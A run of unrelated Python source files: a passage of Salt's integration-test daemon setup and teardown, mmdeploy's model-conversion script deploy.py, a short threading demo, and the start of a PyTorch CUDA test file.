os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(
" * Transplanting configuration files to '{0}'".format(
RUNTIME_VARS.TMP_CONF_DIR
)
)
tests_known_hosts_file = os.path.join(
RUNTIME_VARS.TMP_CONF_DIR, "salt_ssh_known_hosts"
)
with salt.utils.files.fopen(tests_known_hosts_file, "w") as known_hosts:
known_hosts.write("")
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "master")
)
master_opts["known_hosts_file"] = tests_known_hosts_file
master_opts["cachedir"] = "cache"
master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
master_opts["pki_dir"] = "pki"
master_opts["syndic_master"] = "localhost"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
master_opts["pytest_stop_sending_events_file"] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
        # Under Windows we can't seem to properly create a virtualenv off of
        # another virtualenv. We can on Linux, but we will still point to the
        # virtualenv binary outside the virtualenv running the test suite, if
        # that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "minion")
)
minion_opts["cachedir"] = "cache"
minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
minion_opts["pki_dir"] = "pki"
minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "sub_minion")
)
sub_minion_opts["cachedir"] = "cache"
sub_minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts["root_dir"] = os.path.join(TMP, "rootdir-sub-minion")
sub_minion_opts["pki_dir"] = "pki"
sub_minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
sub_minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "syndic_master")
)
syndic_master_opts["cachedir"] = "cache"
syndic_master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts["root_dir"] = os.path.join(TMP, "rootdir-syndic-master")
syndic_master_opts["pki_dir"] = "pki"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_syndic_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
syndic_master_opts[
"pytest_stop_sending_events_file"
] = pytest_stop_sending_events_file
        # This is the syndic for master
        # Let's start with a copy of the syndic master configuration
        syndic_opts = copy.deepcopy(syndic_master_opts)
        # Let's update with the syndic configuration
        syndic_opts.update(
            salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
        )
        syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
        syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
        syndic_opts["root_dir"] = os.path.join(TMP, "rootdir")
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, "proxy"))
proxy_opts["cachedir"] = "cache"
# proxy_opts['user'] = running_tests_user
proxy_opts["root_dir"] = os.path.join(TMP, "rootdir-proxy")
proxy_opts["pki_dir"] = "pki"
proxy_opts["hosts.file"] = os.path.join(TMP, "rootdir-proxy", "hosts")
proxy_opts["aliases.file"] = os.path.join(TMP, "rootdir-proxy", "aliases")
if transport == "tcp":
master_opts["transport"] = "tcp"
minion_opts["transport"] = "tcp"
sub_minion_opts["transport"] = "tcp"
syndic_master_opts["transport"] = "tcp"
proxy_opts["transport"] = "tcp"
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
master_opts.setdefault("reactor", []).append(
{"salt/test/reactor": [os.path.join(FILES, "reactor-test.sls")]}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
proxy_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
"""
try:
if hasattr(self.sub_minion_process, "terminate"):
self.sub_minion_process.terminate()
else:
log.error("self.sub_minion_process can't be terminate.")
except AttributeError:
pass
try:
if hasattr(self.minion_process, "terminate"):
self.minion_process.terminate()
else:
log.error("self.minion_process can't be terminate.")
except AttributeError:
pass
if hasattr(self, "proxy_process"):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
log.error("self.master_process can't be terminate.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
if not running and job_finished is False:
                # Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
                        # An error has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
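# ---------------------------------------------------------------------------
# Hedged usage sketch (added, comments only): TestDaemon is driven by the test
# runner as a context manager, roughly like the following (parser construction
# is simplified; the real runner wires up many more options):
#
#     TestDaemon.transplant_configs(transport="zeromq")
#     with TestDaemon(parser) as daemon:
#         ...  # integration tests run against the started master/minions
#     TestDaemon.clean()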
|
deploy.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import logging
import os.path as osp
from functools import partial
import mmcv
import torch.multiprocessing as mp
from torch.multiprocessing import Process, set_start_method
from mmdeploy.apis import (create_calib_table, extract_model,
get_predefined_partition_cfg, torch2onnx,
visualize_model)
from mmdeploy.utils import (Backend, get_backend, get_calib_filename,
get_ir_config, get_model_inputs, get_onnx_config,
get_partition_config, get_root_logger, load_config,
target_wrapper)
from mmdeploy.utils.export_info import dump_info
def parse_args():
parser = argparse.ArgumentParser(description='Export model to backends.')
parser.add_argument('deploy_cfg', help='deploy config path')
parser.add_argument('model_cfg', help='model config path')
parser.add_argument('checkpoint', help='model checkpoint path')
    parser.add_argument('img', help='image used to convert the model')
parser.add_argument(
'--test-img', default=None, help='image used to test model')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--calib-dataset-cfg',
help='dataset config path used to calibrate.',
default=None)
parser.add_argument(
'--device', help='device used for conversion', default='cpu')
parser.add_argument(
'--log-level',
help='set log level',
default='INFO',
choices=list(logging._nameToLevel.keys()))
parser.add_argument(
'--show', action='store_true', help='Show detection outputs')
parser.add_argument(
'--dump-info', action='store_true', help='Output information for SDK')
args = parser.parse_args()
return args
def create_process(name, target, args, kwargs, ret_value=None):
logger = get_root_logger()
logger.info(f'{name} start.')
log_level = logger.level
wrap_func = partial(target_wrapper, target, log_level, ret_value)
process = Process(target=wrap_func, args=args, kwargs=kwargs)
process.start()
process.join()
if ret_value is not None:
if ret_value.value != 0:
logger.error(f'{name} failed.')
exit()
else:
logger.info(f'{name} success.')
def main():
args = parse_args()
set_start_method('spawn')
logger = get_root_logger()
logger.setLevel(args.log_level)
deploy_cfg_path = args.deploy_cfg
model_cfg_path = args.model_cfg
checkpoint_path = args.checkpoint
# load deploy_cfg
deploy_cfg, model_cfg = load_config(deploy_cfg_path, model_cfg_path)
    # create work_dir if it does not exist
mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
if args.dump_info:
dump_info(deploy_cfg, model_cfg, args.work_dir, pth=checkpoint_path)
ret_value = mp.Value('d', 0, lock=False)
# convert onnx
onnx_save_file = get_onnx_config(deploy_cfg)['save_file']
create_process(
'torch2onnx',
target=torch2onnx,
args=(args.img, args.work_dir, onnx_save_file, deploy_cfg_path,
model_cfg_path, checkpoint_path),
kwargs=dict(device=args.device),
ret_value=ret_value)
# convert backend
onnx_files = [osp.join(args.work_dir, onnx_save_file)]
# partition model
partition_cfgs = get_partition_config(deploy_cfg)
if partition_cfgs is not None:
if 'partition_cfg' in partition_cfgs:
partition_cfgs = partition_cfgs.get('partition_cfg', None)
else:
assert 'type' in partition_cfgs
partition_cfgs = get_predefined_partition_cfg(
deploy_cfg, partition_cfgs['type'])
origin_onnx_file = onnx_files[0]
onnx_files = []
for partition_cfg in partition_cfgs:
save_file = partition_cfg['save_file']
save_path = osp.join(args.work_dir, save_file)
start = partition_cfg['start']
end = partition_cfg['end']
dynamic_axes = partition_cfg.get('dynamic_axes', None)
create_process(
f'partition model {save_file} with start: {start}, end: {end}',
extract_model,
args=(origin_onnx_file, start, end),
kwargs=dict(dynamic_axes=dynamic_axes, save_file=save_path),
ret_value=ret_value)
onnx_files.append(save_path)
# calib data
calib_filename = get_calib_filename(deploy_cfg)
if calib_filename is not None:
calib_path = osp.join(args.work_dir, calib_filename)
create_process(
'calibration',
create_calib_table,
args=(calib_path, deploy_cfg_path, model_cfg_path,
checkpoint_path),
kwargs=dict(
dataset_cfg=args.calib_dataset_cfg,
dataset_type='val',
device=args.device),
ret_value=ret_value)
backend_files = onnx_files
# convert backend
backend = get_backend(deploy_cfg)
if backend == Backend.TENSORRT:
model_params = get_model_inputs(deploy_cfg)
assert len(model_params) == len(onnx_files)
from mmdeploy.apis.tensorrt import is_available as trt_is_available
from mmdeploy.apis.tensorrt import onnx2tensorrt
assert trt_is_available(
), 'TensorRT is not available,' \
+ ' please install TensorRT and build TensorRT custom ops first.'
backend_files = []
for model_id, model_param, onnx_path in zip(
range(len(onnx_files)), model_params, onnx_files):
onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]
save_file = model_param.get('save_file', onnx_name + '.engine')
partition_type = 'end2end' if partition_cfgs is None \
else onnx_name
create_process(
f'onnx2tensorrt of {onnx_path}',
target=onnx2tensorrt,
args=(args.work_dir, save_file, model_id, deploy_cfg_path,
onnx_path),
kwargs=dict(device=args.device, partition_type=partition_type),
ret_value=ret_value)
backend_files.append(osp.join(args.work_dir, save_file))
elif backend == Backend.NCNN:
from mmdeploy.apis.ncnn import is_available as is_available_ncnn
if not is_available_ncnn():
logger.error('ncnn support is not available.')
exit(-1)
from mmdeploy.apis.ncnn import get_output_model_file, onnx2ncnn
backend_files = []
for onnx_path in onnx_files:
model_param_path, model_bin_path = get_output_model_file(
onnx_path, args.work_dir)
create_process(
f'onnx2ncnn with {onnx_path}',
target=onnx2ncnn,
args=(onnx_path, model_param_path, model_bin_path),
kwargs=dict(),
ret_value=ret_value)
backend_files += [model_param_path, model_bin_path]
elif backend == Backend.OPENVINO:
from mmdeploy.apis.openvino import \
is_available as is_available_openvino
assert is_available_openvino(), \
'OpenVINO is not available, please install OpenVINO first.'
from mmdeploy.apis.openvino import (get_input_info_from_cfg,
get_output_model_file,
onnx2openvino)
openvino_files = []
for onnx_path in onnx_files:
model_xml_path = get_output_model_file(onnx_path, args.work_dir)
input_info = get_input_info_from_cfg(deploy_cfg)
output_names = get_ir_config(deploy_cfg).output_names
create_process(
f'onnx2openvino with {onnx_path}',
target=onnx2openvino,
args=(input_info, output_names, onnx_path, args.work_dir),
kwargs=dict(),
ret_value=ret_value)
openvino_files.append(model_xml_path)
backend_files = openvino_files
elif backend == Backend.PPLNN:
from mmdeploy.apis.pplnn import is_available as is_available_pplnn
assert is_available_pplnn(), \
'PPLNN is not available, please install PPLNN first.'
from mmdeploy.apis.pplnn import onnx2pplnn
pplnn_files = []
for onnx_path in onnx_files:
algo_file = onnx_path.replace('.onnx', '.json')
model_inputs = get_model_inputs(deploy_cfg)
assert 'opt_shape' in model_inputs, 'Expect opt_shape ' \
'in deploy config for PPLNN'
# PPLNN accepts only 1 input shape for optimization,
# may get changed in the future
input_shapes = [model_inputs.opt_shape]
create_process(
f'onnx2pplnn with {onnx_path}',
target=onnx2pplnn,
args=(algo_file, onnx_path),
kwargs=dict(device=args.device, input_shapes=input_shapes),
ret_value=ret_value)
pplnn_files += [onnx_path, algo_file]
backend_files = pplnn_files
if args.test_img is None:
args.test_img = args.img
# visualize model of the backend
create_process(
f'visualize {backend.value} model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, backend_files, args.test_img,
args.device),
kwargs=dict(
backend=backend,
output_file=osp.join(args.work_dir, f'output_{backend.value}.jpg'),
show_result=args.show),
ret_value=ret_value)
# visualize pytorch model
create_process(
'visualize pytorch model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, [checkpoint_path],
args.test_img, args.device),
kwargs=dict(
backend=Backend.PYTORCH,
output_file=osp.join(args.work_dir, 'output_pytorch.jpg'),
show_result=args.show),
ret_value=ret_value)
    logger.info('All processes succeeded.')
if __name__ == '__main__':
main()
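# Hedged usage sketch (added, comments only; every path below is a placeholder):
#
#     python deploy.py \
#         /path/to/deploy_config.py /path/to/model_config.py \
#         /path/to/checkpoint.pth demo.jpg \
#         --work-dir work_dir --device cuda:0 --dump-info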
|
creat_threading_function.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
import threading
import time
def func(name):
print("I am %s" % name)
time.sleep(2)
if __name__ == '__main__':
t1 = threading.Thread(target=func, args=("Lyon",))
t2 = threading.Thread(target=func, args=("Kenneth",))
    print(t1.is_alive())
print(t1.daemon)
print(t1.ident)
print(t1.name)
t1.start()
t2.start()
t1.join()
    print(t1.name)
    print(t2.name)
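# ---------------------------------------------------------------------------
# Hedged follow-up sketch (added, not in the original file): the same worker
# run as a daemon thread, so the interpreter would not wait for it at exit
# unless join() is called explicitly.
if __name__ == '__main__':
    d1 = threading.Thread(target=func, args=("Daemon-Lyon",), daemon=True)
    d1.start()
    d1.join(timeout=3)  # wait up to 3 seconds for the daemon worker
    print("daemon worker alive after join:", d1.is_alive())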
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
